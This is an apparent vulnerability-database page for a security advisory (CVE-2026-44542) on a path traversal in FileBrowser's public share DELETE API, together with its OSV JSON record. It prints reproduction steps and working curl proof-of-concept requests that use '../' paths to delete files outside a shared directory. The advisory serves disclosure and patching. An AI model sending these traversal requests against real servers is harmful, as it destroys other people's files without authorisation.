GHSA-FWJ3-42WH-8673

Vulnerability from github – Published: 2026-05-07 03:28 – Updated: 2026-05-14 20:54
VLAI?
Summary
FileBrowser Public Share DELETE API Path Traversal Allows Unauthenticated Arbitrary File Deletion
Details

Summary

Attacker-controlled path input is joined with a trusted base path prior to sanitization, allowing traversal sequences (e.g., ../) to escape the intended shared directory. As a result, an unauthenticated attacker possessing a valid public share hash with delete permissions enabled can delete arbitrary files outside the shared directory within the share owner’s configured storage scope.

Affected Components

Two distinct vulnerable code paths:

  1. Stable versions (e.g., gtstef/filebrowser:stable) DELETE /public/api/resources?hash=<hash>&path=../victim Root cause: middleware.go:111 Issue: path query parameter is joined before SanitizeUserPath()
  2. Development / HEAD (e.g., commit eabdfd9) DELETE /public/api/resources/bulk?hash=<hash> Body: [{"path":"../victim"}] Root cause: resource.go:274 Issue: item.Path is joined before SanitizeUserPath()

Steps to reproduce (Stable Version)

1. Create a directory structure:

/folder/shared_subdir/   (shared)
/folder/protected.txt    (outside shared directory)

2. Create a public share:

Path: /shared_subdir
AllowDelete=true

3. Send request:

curl -X DELETE "http://localhost/public/api/resources?hash=<HASH>&path=../protected.txt"

#Observe:
#protected.txt is deleted despite being outside the shared directory

Proof of Concept (HEAD / bulk endpoint)

curl -X DELETE "http://localhost/public/api/resources/bulk?hash=<HASH>" \
  -H "Content-Type: application/json" \
  -d '[{"path":"../protected.txt"}]'

Alternative PoC Scripts:

poc_v3.sh (If the script fails due to environment differences, the manual PoC above reliably reproduces the issue.)

Impact

An unauthenticated attacker with access to a public share link configured with delete permissions enabled can delete attacker-chosen files outside the shared directory, anywhere within the share owner’s storage scope. This results in unauthorized data loss and potential service disruption.

Severity ?
9.1 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/gtsteffaniak/filebrowser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260501183844-112740bdd41d"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44542"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T03:28:06Z",
    "nvd_published_at": "2026-05-14T18:16:50Z",
    "severity": "CRITICAL"
  },
  "details": "### **Summary**\n\nAttacker-controlled path input is joined with a trusted base path prior to sanitization, allowing traversal sequences (e.g., ../) to escape the intended shared directory. As a result, an unauthenticated attacker possessing a valid public share hash with delete permissions enabled can delete arbitrary files outside the shared directory within the share owner\u2019s configured storage scope.\n\n### **Affected Components**\n\n**Two distinct vulnerable code paths:**\n\n1. Stable versions (e.g., gtstef/filebrowser:stable)\n`DELETE /public/api/resources?hash=\u003chash\u003e\u0026path=../victim`\nRoot cause: middleware.go:111\nIssue: path query parameter is joined before SanitizeUserPath()\n2. Development / HEAD (e.g., commit eabdfd9)\n`DELETE /public/api/resources/bulk?hash=\u003chash\u003e`\nBody: [{\"path\":\"../victim\"}]\nRoot cause: resource.go:274\nIssue: item.Path is joined before SanitizeUserPath()\n\n### **Steps to reproduce (Stable Version)**\n\n**1. Create a directory structure:**\n\n```\n/folder/shared_subdir/   (shared)\n/folder/protected.txt    (outside shared directory)\n```\n\n**2. Create a public share:**\n```\nPath: /shared_subdir\nAllowDelete=true\n```\n\n**3. Send request:**\n\n```\ncurl -X DELETE \"http://localhost/public/api/resources?hash=\u003cHASH\u003e\u0026path=../protected.txt\"\n\n#Observe:\n#protected.txt is deleted despite being outside the shared directory\n```\n\n### **Proof of Concept (HEAD / bulk endpoint)**\n\n```\ncurl -X DELETE \"http://localhost/public/api/resources/bulk?hash=\u003cHASH\u003e\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027[{\"path\":\"../protected.txt\"}]\u0027\n```\n\n### **Alternative PoC Scripts:**\n[poc_v3.sh](https://github.com/user-attachments/files/26159404/poc_v3.sh) (**If the script fails due to environment differences, the manual PoC above reliably reproduces the issue.**)\n\n\n### **Impact**\nAn unauthenticated attacker with access to a public share link configured with delete permissions enabled can delete attacker-chosen files outside the shared directory, anywhere within the share owner\u2019s storage scope. This results in unauthorized data loss and potential service disruption.",
  "id": "GHSA-fwj3-42wh-8673",
  "modified": "2026-05-14T20:54:32Z",
  "published": "2026-05-07T03:28:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-fwj3-42wh-8673"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44542"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gtsteffaniak/filebrowser/commit/112740bdd41de7d5eb01e13ba49d406bfc463f69"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gtsteffaniak/filebrowser"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "FileBrowser Public Share DELETE API Path Traversal Allows Unauthenticated Arbitrary File Deletion"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.